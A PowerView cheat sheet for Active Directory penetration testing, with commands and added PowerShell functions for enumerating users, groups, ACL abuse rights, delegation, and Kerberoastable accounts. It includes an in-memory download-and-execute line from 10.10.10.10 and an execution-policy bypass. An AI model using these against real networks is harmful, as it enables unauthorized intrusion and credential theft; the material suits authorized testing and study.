PowerView

Extra: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview

Import-Module

Import-Module .\PowerView.ps1
. .\PowerView.ps1    # dot-source: same effect, the functions land in the current scope
iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1')    # in-memory load, nothing written to disk
# if script execution is blocked: powershell -ep bypass

Get-Domain

Get-Domain
Get-Domain -Domain vulnableone.local

Get-DomainSID

Get-DomainSID
Get-DomainSID -Domain vulnableone.local

Get-DomainController

Get-DomainController | select Forest, Name, OSVersion | fl
Get-DomainController -Domain vulnableone.local

Get-DomainPolicyData

Get-DomainPolicyData | select -expand SystemAccess
(Get-DomainPolicyData).KerberosPolicy
(Get-DomainPolicyData -Domain vulnableone.local).KerberosPolicy

Get-DomainUser

Get-DomainUser | select samaccountname, pwdlastset, logoncount
Get-DomainUser -Identity khan.chanthou -Properties DisplayName, MemberOf | fl
Get-DomainUser -LDAPFilter "(description=*built*)" | select name, description    # LDAP filters need the surrounding parentheses
Get-DomainUser -LDAPFilter "(name=*admin*)" | select name, description

Get-DomainComputer

Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
Get-DomainComputer -OperatingSystem "Windows Server 2019*"
Get-DomainComputer -OperatingSystem "Windows 11*"
Get-DomainComputer -Ping

Get-DomainOU

Get-DomainOU -Properties Name | sort -Property Name
Get-DomainOU | select name, gplink
(Get-DomainOU).distinguishedname | %{Get-DomainComputer -SearchBase $_} | Get-DomainGPOComputerLocalGroupMapping
(Get-DomainOU -Identity Sales).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

Get-DomainGroup

Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
Get-DomainGroup *admin* | select name
Get-DomainGroup -Domain vulnableone.local | where Name -like "*Admins*" | select SamAccountName
Get-DomainGroup *admin* -Domain vulnableone.local | select name
Get-DomainGroup -UserName khan.chanthou | select name
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
Get-NetLocalGroup -ComputerName WST1    # local groups on the host
Get-NetLocalGroupMember -ComputerName WST1    # members of the local Administrators group (the default -GroupName)
Get-NetLocalGroupMember -ComputerName WST1 -GroupName Administrators    # same, explicit; on Windows 10 / Server 2016+ this usually needs admin rights on the target (remote SAM access is restricted)

Get-DomainGPO

Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
Get-DomainGPO -ComputerIdentity WST1 -Properties DisplayName | sort -Property DisplayName
Get-DomainGPO -Identity '{6AC1786C-016F-11D2-945F-00C04fB984F9}'

Get-DomainGPOLocalGroup

Get-DomainGPOLocalGroup | select GPODisplayName, GroupName

Get-DomainGPOUserLocalGroupMapping

Maps users and groups to the local groups that Group Policy (Restricted Groups or Group Policy Preferences) puts them in on the computers each GPO applies to. This is useful for finding where domain groups have local admin access without touching the hosts; the mapping is built from LDAP and SYSVOL, so it can be stale (disabled link, WMI filter, offline host) and should be confirmed with Find-LocalAdminAccess before relying on it.

Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
Get-DomainGPOUserLocalGroupMapping -Identity khan.chanthou -Verbose
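
The two commands above tell you where the current user should be a local admin according to Group Policy; the following added example (not from the original page) takes that list and confirms each host live with PowerView's Test-AdminAccess, which opens the remote Service Control Manager and only succeeds with real admin rights. It assumes PowerView is already loaded; the function name is this example's own.

```powershell
# Added example: GPO-derived local admin hosts, confirmed one by one.
# Assumes PowerView.ps1 is loaded in this session.

function Confirm-GpoLocalAdmin {
    param([string]$Identity = $env:USERNAME)

    # One row per (principal, GPO): the principal is the user itself or a group it is in,
    # and ComputerName holds every host in the OUs the GPO is linked to.
    $mapped = Get-DomainGPOUserLocalGroupMapping -Identity $Identity -LocalGroup Administrators

    $hosts = $mapped | ForEach-Object { $_.ComputerName } | Where-Object { $_ } | Sort-Object -Unique
    foreach ($h in $hosts) {
        $rows = $mapped | Where-Object { $_.ComputerName -contains $h }
        $via  = ($rows | ForEach-Object { $_.ObjectName }     | Sort-Object -Unique) -join ';'
        $gpos = ($rows | ForEach-Object { $_.GPODisplayName } | Sort-Object -Unique) -join ';'

        # Live check: OpenSCManager with SC_MANAGER_ALL_ACCESS fails unless we are really admin.
        # An offline host simply comes back as Confirmed = False.
        $check = Test-AdminAccess -ComputerName $h -ErrorAction SilentlyContinue

        [pscustomobject]@{
            ComputerName = $h
            ViaPrincipal = $via
            GPO          = $gpos
            Confirmed    = [bool]$check.IsAdmin
        }
    }
}

Confirm-GpoLocalAdmin | Format-Table -AutoSize
```

Compared with running Find-LocalAdminAccess straight away (one SCM connection to every computer in the domain), this only touches the hosts the policy says you should own, which is both faster and far less noisy in the logs of hosts you have no business on.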

Get-DomainObjectACL

Get-DomainObjectAcl -Identity khan.chanthou -ResolveGUIDs
Get-DomainObjectAcl -Searchbase "LDAP://CN=Domain Admins,CN=Users,DC=vulnableone,DC=local" -ResolveGUIDs -Verbose
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
Find-InterestingDomainAcl
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "khan.chanthou"}
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "IT_Groups"}

GenericAll

Users

# every principal holding GenericAll over any user object
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs |
    ForEach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.Value) -Force; $_ } |
    Where-Object { $_.ActiveDirectoryRights -eq 'GenericAll' }

Groups

# GenericAll over group objects held by the current user
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs |
    ForEach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.Value) -Force; $_ } |
    Where-Object { $_.ActiveDirectoryRights -eq 'GenericAll' -and $_.Identity -eq "$env:UserDomain\$env:Username" }

GenericWrite

Users

# GenericWrite over user objects held by the current user
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs |
    ForEach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.Value) -Force; $_ } |
    Where-Object { $_.ActiveDirectoryRights -like '*GenericWrite*' -and $_.Identity -eq "$env:UserDomain\$env:Username" }

Computers

# every principal holding GenericWrite over any computer object (RBCD / SPN write candidates)
Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs |
    ForEach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.Value) -Force; $_ } |
    Where-Object { $_.ActiveDirectoryRights -like '*GenericWrite*' }
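
The one-liners above each answer one question (one right, one object class, sometimes only for the current user). The following added example, which is not from the original page, does the whole ACL pass at once: it collects the SIDs behind the current token (the user, every group it is in through tokenGroups, plus Everyone and Authenticated Users), walks the domain's DACLs with Get-DomainObjectAcl, keeps only allow ACEs those SIDs hold, and labels each with the abuse primitive it gives. It deliberately does not use Find-InterestingDomainAcl, which skips trustees with a RID below 1000 and therefore never shows an ACE granted to Domain Users or Authenticated Users. It assumes PowerView is loaded; the function names, the primitive labels and the CSV path are this example's own.

```powershell
# Added example: all write-class ACEs the current user holds, directly or via groups.
# Assumes PowerView.ps1 is loaded in this session.

function Get-TokenSidMap {
    param([string]$Identity = $env:USERNAME)
    $map  = @{}
    $user = Get-DomainUser -Identity $Identity -Properties objectsid,samaccountname
    $map[$user.objectsid] = $user.samaccountname
    # -MemberIdentity resolves membership via tokenGroups, so nested groups and the primary group are included
    Get-DomainGroup -MemberIdentity $Identity -Properties objectsid,samaccountname |
        ForEach-Object { $map[$_.objectsid] = $_.samaccountname }
    $map['S-1-1-0']  = 'Everyone'
    $map['S-1-5-11'] = 'Authenticated Users'
    $map
}

function Get-AbusePrimitive {
    param($Ace)
    $rights = [string]$Ace.ActiveDirectoryRights
    $type   = [string]$Ace.ObjectAceType          # '' for a non-object ACE, a schema name when -ResolveGUIDs resolved it
    $all    = ($type -eq '' -or $type -eq 'All')  # ACE covers every attribute / every extended right
    if ($rights -match 'GenericAll')   { return 'GenericAll' }
    if ($rights -match 'WriteDacl')    { return 'WriteDacl' }
    if ($rights -match 'WriteOwner')   { return 'WriteOwner' }
    if ($rights -match 'GenericWrite') { return 'GenericWrite' }
    if ($rights -match 'WriteProperty' -and $all)               { return 'WriteAllProperties' }
    if ($rights -match 'WriteProperty' -and $type -eq 'Member') { return 'AddMember' }
    if ($rights -match 'WriteProperty' -and $type -match 'Script-Path|Service-Principal-Name|Allowed-To-Act-On-Behalf') { return "WriteAttribute:$type" }
    if ($rights -match 'Self' -and $type -eq 'Self-Membership') { return 'AddSelf' }
    if ($rights -match 'ExtendedRight' -and $all)               { return 'AllExtendedRights' }
    if ($rights -match 'ExtendedRight') {
        switch -Regex ($type) {
            'User-Force-Change-Password' { return 'ForceChangePassword' }
            'DS-Replication-Get-Changes' { return 'DCSync-Part' }   # needs both Get-Changes and Get-Changes-All
        }
    }
    return 'Other'
}

function Find-MyInterestingAcl {
    param([string]$Identity = $env:USERNAME, [string]$SearchBase)
    $sidMap  = Get-TokenSidMap -Identity $Identity
    $aclArgs = @{ ResolveGUIDs = $true }
    if ($SearchBase) { $aclArgs['SearchBase'] = $SearchBase }   # scope to an OU on a large domain; whole-domain is slow

    Get-DomainObjectAcl @aclArgs |
        Where-Object {
            $_.AceQualifier -eq 'AccessAllowed' -and
            $sidMap.ContainsKey([string]$_.SecurityIdentifier) -and
            $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|Self|ExtendedRight'
        } |
        ForEach-Object {
            [pscustomobject]@{
                Target    = $_.ObjectDN
                Via       = $sidMap[[string]$_.SecurityIdentifier]
                Rights    = [string]$_.ActiveDirectoryRights
                AceType   = [string]$_.ObjectAceType
                Inherited = $_.IsInherited
                Primitive = Get-AbusePrimitive $_
            }
        } |
        Where-Object { $_.Primitive -ne 'Other' } |
        Sort-Object Primitive, Target
}

$report = Find-MyInterestingAcl      # e.g. -SearchBase 'OU=Sales,DC=vulnableone,DC=local' to narrow it
$report | Format-Table -AutoSize
$report | Export-Csv -NoTypeInformation -Path .\my-interesting-acls.csv   # assumed output path
```

Read the Via column first: an ACE held through Authenticated Users or Domain Users is a misconfiguration every account in the domain can use, while one held through a nested group tells you which membership to protect. The Inherited column separates an ACE set on the object from one flowing down from an OU, which matters when you want to know how wide the exposure is.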

Get-DomainTrust

Get-DomainTrust
Get-DomainTrust -Domain vulnableone.local

Get-ForestDomain

Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog
Get-ForestTrust
Get-ForestTrust -Forest vulnableone.local
# External Trust
Get-ForestDomain -Verbose | Get-DomainTrust | ?{$_.TrustAttributes -match 'FILTER_SIDS'}    # -match, not -eq: TrustAttributes is a flag set and external trusts often carry extra flags

Kerberoast

Get-DomainUser -SPN | select samaccountname, serviceprincipalname, pwdlastset

ASREPRoast

Get-DomainUser -PreauthNotRequired

Unconstrained Delegation

Get-DomainComputer -Unconstrained | select dnshostname    # domain controllers always appear here; any other host is the finding
Get-DomainUser -UACFilter TRUSTED_FOR_DELEGATION -Properties distinguishedname

Constrained Delegation

Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto, useraccountcontrol
Get-DomainComputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto, useraccountcontrol
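
The Kerberoast, ASREPRoast, unconstrained and constrained delegation checks above are usually run one after another and eyeballed. The following added example, which is not from the original page, merges them into one ranked table: each account gets a class, the age of its password (older passwords are more likely to be weak and crackable), whether service tickets for it will come back RC4 rather than AES, whether it can do protocol transition, and whether it sits in a privileged group. It assumes PowerView is loaded; the admin-group regex and the Privileged flag are this example's own assumptions, and the LDAP attribute names are the real ones.

```powershell
# Added example: one pass over the Kerberos attack surface visible to any domain user.
# Assumes PowerView.ps1 is loaded in this session.

$AdminGroupRegex = 'Domain Admins|Enterprise Admins|Administrators|Account Operators|Backup Operators'   # assumption

function New-KerbFinding {
    param($Class, $Account, $Detail, $PwdLastSet, $MemberOf, $UserAccountControl, $EncTypes)

    # PowerView converts pwdLastSet to a DateTime; a 1601 date means the password was never set.
    $ageDays = if ($PwdLastSet -is [datetime]) { [int]((Get-Date) - $PwdLastSet).TotalDays } else { $null }

    # msDS-SupportedEncryptionTypes: 0x8 = AES128, 0x10 = AES256. No attribute, or no AES bit,
    # means the KDC issues RC4 tickets, which crack far faster than AES ones.
    $rc4Only = (([int]$EncTypes -band 0x18) -eq 0)

    # TRUSTED_TO_AUTH_FOR_DELEGATION (0x1000000) = protocol transition: the account can get a
    # service ticket for any user to its allowed SPNs without that user ever authenticating.
    # PowerView may hand UAC back as an int or as flag names, so check both forms.
    $uacText = [string]$UserAccountControl
    $uacInt  = $UserAccountControl -as [int]
    $transition = ($uacText -match 'TRUSTED_TO_AUTH_FOR_DELEGATION') -or (($uacInt -band 0x1000000) -ne 0)

    [pscustomobject]@{
        Class      = $Class
        Account    = $Account
        Detail     = $Detail
        PwdAgeDays = $ageDays
        RC4Only    = $rc4Only
        Transition = $transition
        Privileged = [bool]($MemberOf -match $AdminGroupRegex)
    }
}

function Get-KerberosAttackSurface {
    $findings = @()

    # Kerberoast: any authenticated user can request a TGS for these SPNs and crack it offline.
    # krbtgt always carries an SPN and its key is not practically crackable, so it is skipped.
    $findings += Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname,pwdlastset,memberof,useraccountcontrol,'msds-supportedencryptiontypes' |
        Where-Object { $_.samaccountname -ne 'krbtgt' } |
        ForEach-Object { New-KerbFinding 'Kerberoast' $_.samaccountname ($_.serviceprincipalname -join ';') $_.pwdlastset $_.memberof $_.useraccountcontrol $_.'msds-supportedencryptiontypes' }

    # AS-REP roast: pre-authentication is off, so an AS-REQ without a timestamp still gets a reply
    # encrypted under the user's key (ask for RC4 explicitly when roasting).
    $findings += Get-DomainUser -PreauthNotRequired -Properties samaccountname,pwdlastset,memberof,useraccountcontrol,'msds-supportedencryptiontypes' |
        ForEach-Object { New-KerbFinding 'ASREPRoast' $_.samaccountname 'DONT_REQ_PREAUTH' $_.pwdlastset $_.memberof $_.useraccountcontrol $_.'msds-supportedencryptiontypes' }

    # Unconstrained delegation: the host caches every inbound TGT. Domain controllers always have
    # the flag (primaryGroupID 516, RODCs 521), so only other hosts are reported.
    $findings += Get-DomainComputer -Unconstrained -Properties samaccountname,dnshostname,primarygroupid,operatingsystem |
        Where-Object { @(516, 521) -notcontains [int]$_.primarygroupid } |
        ForEach-Object { New-KerbFinding 'Unconstrained' $_.samaccountname "$($_.dnshostname) ($($_.operatingsystem))" $null $null $null $null }

    # Constrained delegation: the account may impersonate users to the SPNs in msDS-AllowedToDelegateTo.
    $constrained = @(Get-DomainUser -TrustedToAuth -Properties samaccountname,'msds-allowedtodelegateto',pwdlastset,memberof,useraccountcontrol) +
                   @(Get-DomainComputer -TrustedToAuth -Properties samaccountname,'msds-allowedtodelegateto',useraccountcontrol)
    $findings += $constrained |
        ForEach-Object { New-KerbFinding 'Constrained' $_.samaccountname ('to=' + ($_.'msds-allowedtodelegateto' -join ';')) $_.pwdlastset $_.memberof $_.useraccountcontrol $null }

    $findings | Where-Object { $_ } |
        Sort-Object -Property @{Expression = 'Privileged'; Descending = $true}, Class, @{Expression = 'PwdAgeDays'; Descending = $true}
}

Get-KerberosAttackSurface | Format-Table -AutoSize
```

Privileged accounts float to the top, then within each class the oldest passwords. A Kerberoast row that is Privileged, RC4Only and has a password several years old is the first thing to crack; a Constrained row with Transition = True is a straight path to the listed SPNs (S4U2self then S4U2proxy) without needing any user to log on.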

Find-DomainShare

Find-DomainShare -CheckShareAccess

Find-LocalAdminAccess

Find-LocalAdminAccess -Verbose